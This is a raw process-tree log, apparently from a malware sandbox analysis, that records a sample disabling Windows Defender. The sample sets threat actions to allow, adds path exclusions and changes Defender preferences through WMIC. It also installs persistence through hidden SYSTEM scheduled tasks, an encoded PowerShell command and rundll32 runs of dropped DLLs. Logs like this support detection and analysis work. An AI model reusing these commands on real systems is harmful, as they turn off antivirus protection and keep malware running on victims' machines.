- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:96
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:323⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:324⤵PID:3380
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:643⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:323⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:643⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:323⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:643⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:323⤵PID:3800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:643⤵PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:323⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:643⤵PID:3984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:323⤵PID:3948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:323⤵PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:643⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:323⤵PID:2252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:643⤵PID:4776
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glSCsmVNO" /SC once /ST 02:05:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glSCsmVNO"2⤵PID:4768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glSCsmVNO"2⤵PID:2380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 04:07:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\VsbdFRU.exe\" MC /WWKDdidQB 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fxxmGIjnSbKlnnNZc"2⤵PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 8122⤵
- Program crash
PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:596
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4840
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1364
-
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\VsbdFRU.exeC:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\VsbdFRU.exe MC /WWKDdidQB 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4248 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"2⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3568
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\HaoVtf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\ynQXpqM.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHXYugTugXnbcjp"2⤵PID:4376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHXYugTugXnbcjp"2⤵PID:3684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\wZMIrya.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\KATuUDf.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\JFYWEla.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\MANdIKV.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wVNtBGnRpnzfZepfO" /SC once /ST 03:39:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\bpNowFaEeWbSfYmu\EcXDfirX\EnkZmhg.dll\",#1 /zIjGdidUnP 525403" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wVNtBGnRpnzfZepfO"2⤵PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"2⤵PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 17282⤵
- Program crash
PID:5076
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\bpNowFaEeWbSfYmu\EcXDfirX\EnkZmhg.dll",#1 /zIjGdidUnP 5254031⤵PID:4124
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\bpNowFaEeWbSfYmu\EcXDfirX\EnkZmhg.dll",#1 /zIjGdidUnP 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
